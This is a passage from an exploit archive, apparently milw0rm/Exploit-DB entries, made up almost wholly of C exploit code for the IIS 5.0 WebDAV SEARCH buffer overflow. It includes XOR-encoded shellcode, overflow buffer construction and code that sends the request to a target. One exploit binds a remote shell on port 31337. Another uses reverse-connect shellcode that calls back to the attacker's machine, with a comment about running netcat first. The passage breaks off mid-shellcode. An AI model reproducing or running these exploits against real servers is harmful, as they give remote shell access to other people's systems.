"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
* xor al, al
* inc al
* repnz scasb
* jmp edi
*/

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv) 
{

unsigned long ret;
unsigned short port;
int tport, bport, s, i, j, r, rt=0;
struct hostent *h;
struct sockaddr_in dst;
char buffer[MAXBUF];

if (argc < 2 || argc > 5) 
{
printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
exit(-1);
}

// Default target port = 80
if (argc > 2)
tport = atoi(argv[2]);
else
tport = 80;

// Default bind port = 31337
if (argc > 3)
bport = atoi(argv[3]);
else
bport = 31337;

// Default ret value = RET
if (argc > 4)
ret = strtoul(argv[4], NULL, 16);
else
ret = RET;

if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 ) 
{
fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
exit(-2);
}

// Shellcode patching
port = htons(bport);
port ^= 0x9999;

if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) ) 
{
fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n");
exit(-3);
}

*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
// If the last two items contain any null-bytes, exploit will fail.
// WARNING: this check is not performed here. Be careful and check it for yourself!

// Resolve hostname
printf("[*] Resolving hostname ...\n");
if ((h = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "%s: unknown hostname\n", argv[1]);
exit(-4);
}

bcopy(h->h_addr, &dst.sin_addr, h->h_length);
dst.sin_family = AF_INET;
dst.sin_port = htons(tport);

// Socket creation
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
{
perror("Failed to create socket");
exit(-5);
}

// Connection
if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
{
perror("Failed to connect");
exit(-6);
}

// Build malicious string...
printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff); 

bzero(buffer, MAXBUF);
strcpy(buffer, "SEARCH /");

i = strlen(buffer);
buffer[i] = NOP; // Align for RET overwrite

// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-) 
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;

// The rest is padded with NOP's. RET address should point to this zone!
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;

// Then we skip the body of the HTTP request
memcpy(&buffer[j], jumpcode, strlen(jumpcode));

strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
strcpy(buffer+strlen(buffer), body);

// This byte is used to mark the beginning of the shellcode
memset(buffer+strlen(buffer), 0x01, 1);

// And finally, we land into our shellcode
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);

// Send request
if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-7);
}

printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

// Receive response
while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
rt += r;
// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF
// and an overflow would occur here. Yes, I'm lazy... :-)

buffer[rt] = '\0';

if (rt > 0)
printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
else
printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);

close(s);

}

// milw0rm.com [2003-03-24]
		

- Vulnerability information (36)

MS Windows WebDav II (New) Remote Root Exploit (EDBID:36)
windows remote
2003-06-01 Verified
80 alumni
N/A
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*	    29/05/2003 - by Alumni -                   */
/*              Microsoft IIS WebDAV New Exploit           */
/*                 spawns shell on port 32768                 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/

#include <stdio.h>
#include <winsock.h>
#include <windows.h>

#define SHELLCODELEN	753
#define NOP				0x90
#define BUFFERLEN		1024
#define RET				0x41424344

#define GMHOFF	30
#define GPAOFF	38
#define IPOFF	161
#define DEFPORT	32768


//#define DEBUGGEE_FLOW	// for debug only

#ifdef DEBUGGEE_FLOW
#define GMH		(long)GetModuleHandle
#define GPA		(long)GetProcAddress
#else
#define GMH		0x0100107C	// GetModuleHandle@
#define GPA		0x01001034	// GetProcAddress@
#endif


#define XOROFF	11
#define SOFF	16


char prologue[] =
"\xEB\x03"	// jmp $+3
"\x58"		// pop eax
"\x50"		// push eax
"\xC3"		// retn
"\xE8\xF8\xFF\xFF\xFF"	// call $-3
"\xB2"		// mov dl, %key

"\x90"		// %key
"\x33\xC9"	// xor ecx, ecx
"\x66\xB9"	// mov cx, shellcodesize

"\x04\x03"	// shellcodesize = hex(SHELLCODELEN)
"\x04\x14"	// add al, 0x14
"\x30\x10"	// xor byte ptr[eax], dl
"\x40"		// inc eax
"\x66\x49"	// dec cx
"\x67\xE3\x02"	// jcxz $+5
"\xEB\xF6"	// jmp $-8
;


char shellcode[SHELLCODELEN+1] =
"\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80"
"\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46"
"\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46"
"\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81"
"\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4"
"\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0"
"\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b"
"\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b"
"\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00"
"\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2"
"\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b"
"\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b"
"\xd6\x83\xc2\x14\xb8"
"\x7f\x00\x00\x01"		// put your ip here (run netcat before, e.g. 127.0.0.1)
"\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8"
"\x80\x00"			// specify connectious port here (e.g. 32768)
"\x66\x89\x42"
"\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76"
"\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2"
"\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84"
"\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00"
"\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52"
"\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00"
"\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b"
"\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43"
"\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7"
"\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47"
"\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00"
"\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00"
"\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b"
"\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff"
"\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7"
"\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7"
"\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c"
"\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90"
"\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a"
"\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52"
"\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff"
"\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81"
"\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc"
"\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08"
"\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3"
"\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1"
"\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00"
"\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00"
"\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b"
"\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08"
"\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5"
"\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56"
"\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff"
"\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c"
"\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65"
"\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65"
"\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b"
"\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e"
"\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c"
"\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c"
"\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65"
"\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00"
"\x52\x65\x61\x64\x46\x69\x6c\x65\x00";


char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
				"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


long retaddr, buffsize;
char* buffer;



unsigned long getlocalhostip()
{
	char buff[128];
	in_addr inaddr;
	if(!gethostname(buff,128))
	{
		memcpy(&inaddr,gethostbyname(buff)->h_addr,4);
		return(inet_addr(inet_ntoa(inaddr)));
	}
	return (-1);
}



ULONG WINAPI AcceptThread(LPVOID lpParam)
{
	int ln1;
	unsigned long slisten, sacc;
	sockaddr_in saddrin;
	
	slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (slisten!=INVALID_SOCKET)
	{
		saddrin.sin_addr.s_addr = INADDR_ANY;
		saddrin.sin_family = AF_INET;
		saddrin.sin_port = htons(DEFPORT);
		bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin));
		listen(slisten,5);
		while (1)
		{
			ln1 = sizeof(saddrin);
			sacc = accept(slisten,(struct sockaddr*)&saddrin,&ln1);
			if (sacc!=INVALID_SOCKET)
			{
				printf("\n\nShell successfully spawned on remote host\nNetcat to %d",DEFPORT);
				ExitProcess(0);
			}
		}
	}
	return (1);
}


ULONG SendRequest (char* sHost, int iPort)
{
	char* buffsend;
	struct sockaddr_in saddr_in;
	int timeout;
	unsigned long sock;

	buffsend = (char*)malloc(buffsize+256);
	memset(buffsend,0,buffsize+256);
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	saddr_in.sin_addr.s_addr = inet_addr(sHost);
	saddr_in.sin_family = AF_INET;
	saddr_in.sin_port = htons(iPort);
	if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in)))
	{
		timeout = 5000;
		setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
		setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout));
		sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen(buffer),xmlbody,buffer);
		send (sock,buffsend,strlen(buffsend),0);
		closesocket(sock);
	}
	else return(1);
	
	return (0);
}


void dispUsage(char* str1)
{
	printf ("IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n");
	printf ("Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>]\n\n",str1);
	return;
}

int main(int argc, char** argv)
{
	unsigned long uThread;
	int prologuelen = 0, i;
	char xorkey = 0;
	long *ptr1;
	WSADATA wsadata;

	WSAStartup(MAKEWORD(2,0),&wsadata);
	buffsize = BUFFERLEN;
	retaddr = RET;

#ifndef DEBUGGEE_FLOW
	if (argc<3)
	{
		dispUsage(argv[0]);
		return (1);
	}
	if (argc>=4) buffsize = atoi(argv[3]);
	if (argc>=5) retaddr = atol(argv[4]);
#endif
	
	buffer = (char*) malloc(buffsize+1);
	ptr1 = (long*)buffer;
	memset(buffer,0,buffsize);
	CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)AcceptThread,NULL,NULL,&uThread);
	
	*(long*)(shellcode+GMHOFF) = GMH;
	*(long*)(shellcode+GPAOFF) = GPA;
	*(long*)(shellcode+IPOFF) = getlocalhostip();

	for (i=0;i<256;i++)
	{
		int iBool = 1, j;
		for (j=0;j<SHELLCODELEN;j++)
			if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d || (shellcode[j]^i)==0x0a) iBool = 0;
		if (iBool)
		{
			xorkey = i;
			break;
		}
	}

	for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey;
	for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP;
	prologue[XOROFF] = xorkey;
	*(short int*)(prologue+SOFF) = SHELLCODELEN;

	strncat(buffer,prologue,buffsize);
	
	prologuelen = strlen(buffer);
	for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] = shellcode[i-prologuelen];
	prologuelen = strlen(buffer);
	buffer[prologuelen] = NOP;
	buffer[prologuelen+1] = NOP;
	buffer[prologuelen+2] = NOP;
	buffer[prologuelen+3] = NOP;
	for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr)) *(long*)(buffer+i) = retaddr;
	buffer[buffsize] = 0;

	printf ("%s",buffer);


#ifdef DEBUGGEE_FLOW
	__asm {
		mov eax, ptr1
		call eax
	}
#else
	SendRequest(argv[1],atoi(argv[2]));
#endif

	WSACleanup();
	return (0);
}


// milw0rm.com [2003-06-01]
		

- Vulnerability information (51)

MS Windows WebDav III remote root Exploit (xwdav) (EDBID:51)
windows remote
2003-07-08 Verified
80 Schizoprenic
N/A
/*
 * IIS 5.0 WebDAV Exploit Xnuxer Lab
 * By Schizoprenic, Copyright (c) 2003
 * WebDAV exploit without netcat or telnet and with pretty magic number as RET
 */

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define  RET             0xc9c9   
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
 
unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
